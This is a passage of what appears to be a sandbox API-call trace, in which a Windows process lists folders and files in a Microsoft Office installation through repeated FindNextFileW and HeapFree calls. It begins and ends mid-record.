cFileName="kk", cAlternateFileName="")) returned 1 [0166.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.697] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f9c329, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0166.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.699] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0166.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.699] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0166.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.700] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ms", cAlternateFileName="")) returned 1 [0166.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.702] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b3ce622, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9f00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msipc.dll", cAlternateFileName="")) returned 1 [0166.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.703] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0166.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.705] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl", cAlternateFileName="")) returned 1 [0166.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.707] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt", cAlternateFileName="")) returned 1 [0166.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.708] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0166.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.710] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0166.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.711] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0166.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.713] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0166.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.718] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0166.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.718] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-BA", cAlternateFileName="SR-CYR~1")) returned 1 [0166.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.718] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-CS", cAlternateFileName="SR-CYR~2")) returned 1 [0166.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.718] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0166.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.718] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0166.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.719] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6ed802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="th", cAlternateFileName="")) returned 1 [0166.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.721] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0166.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.721] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0166.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.721] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0166.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.723] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0166.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.724] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0166.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.726] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0166.726] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0166.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.726] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0166.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.954] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdb652e29, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x205e48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0166.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0166.962] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656d8, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0167.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0167.011] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2be48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PDFREFLOW.EXE", cAlternateFileName="PDFREF~1.EXE")) returned 1 [0167.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.012] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf31b5d3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0167.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.012] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0167.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.013] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msgr8en.dub", cAlternateFileName="")) returned 1 [0167.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.014] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec90856, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xded02ee7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14c660, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PropertyModel.dll", cAlternateFileName="PROPER~1.DLL")) returned 1 [0167.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.016] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2296098c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0460, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0167.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.033] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0167.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.033] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd71a51a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd71a51a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xad30, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="rdpqoemetrics.dll", cAlternateFileName="RDPQOE~1.DLL")) returned 1 [0167.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.034] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4fef2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8aa50, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SAVASWEB.DLL", cAlternateFileName="")) returned 1 [0167.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.035] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x397278, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0167.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.640] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4cce0ca, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cce0ca, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0167.641] FindClose (in: hFindFile=0x727b88 | out: hFindFile=0x727b88) returned 1 [0167.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0167.641] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1349614, 